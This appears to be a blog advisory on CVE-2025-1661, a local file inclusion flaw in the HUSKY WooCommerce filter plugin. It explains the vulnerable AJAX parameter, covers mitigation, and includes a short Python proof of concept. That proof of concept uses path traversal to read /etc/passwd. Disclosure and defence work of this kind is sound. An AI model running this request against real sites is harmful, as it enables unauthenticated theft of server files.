CVE-2025-1661 - Local File Inclusion Vulnerability in HUSKY - Products Filter Professional for WooCommerce Plugin in WordPress

A security vulnerability has been discovered in the HUSKY - Products Filter Professional for WooCommerce plugin for WordPress. The plugin, designed to enhance the filtering capabilities of a WooCommerce store, is vulnerable to Local File Inclusion (LFI) attacks. This vulnerability affects all versions of the plugin up to, and including, 1.3.6.5.

The LFI vulnerability could allow unauthenticated attackers to execute arbitrary files on the server, bypassing access controls and potentially gaining unauthorized access to sensitive data or even executing malicious PHP code. This blog post will dive into the details of CVE-2025-1661, including the exploit code and reference links.

Original References

1. HUSKY - Products Filter Professional for WooCommerce plugin - Official Site
2. The issue tracking system - GitHub repository
3. WordPress security advisory - WordPress plugin repository

Exploit Details

The vulnerability exists in the 'woof_text_search' AJAX functionality of the plugin. Attackers can abuse the 'template' parameter to make the server include and execute arbitrary files, leading to LFI attacks. In some cases, this can lead to the execution of PHP code within supposedly safe files, such as images.

Code Snippet (Proof of Concept)

import requests

url = "http://example.com/wp-admin/admin-ajax.php";
params = {
    "action": "woof_text_search",
    "template": "../../../../../../../../etc/passwd",  # Replace with desired file path
}
response = requests.get(url, params=params)

if response.status_code == 200:
    print(response.text)
else:
    print("Exploit failed.")

This proof of concept demonstrates the exploitation of the LFI vulnerability by attempting to access the '/etc/passwd' file on the server, which is a commonly targeted file in UNIX-based systems.

Mitigation

The issue can be remediated by either temporarily disabling the plugin or upgrading to the latest version, which has patched the vulnerability. To prevent further exploitation, it's also advisable to restrict access to the vulnerable AJAX functionality.

Conclusion

The HUSKY - Products Filter Professional for WooCommerce plugin for WordPress, up to and including version 1.3.6.5, is vulnerable to Local File Inclusion attacks. This vulnerability, tracked as CVE-2025-1661, allows unauthenticated attackers to include and execute arbitrary files on the server, potentially gaining unauthorized access and leading to sensitive data leaks or code execution. Mitigation efforts must involve upgrading to the latest version or temporarily disabling the plugin while restricting access to vulnerable AJAX functionality.

Timeline

Published on: 03/11/2025 04:15:24 UTC
Last modified on: 03/19/2025 20:48:03 UTC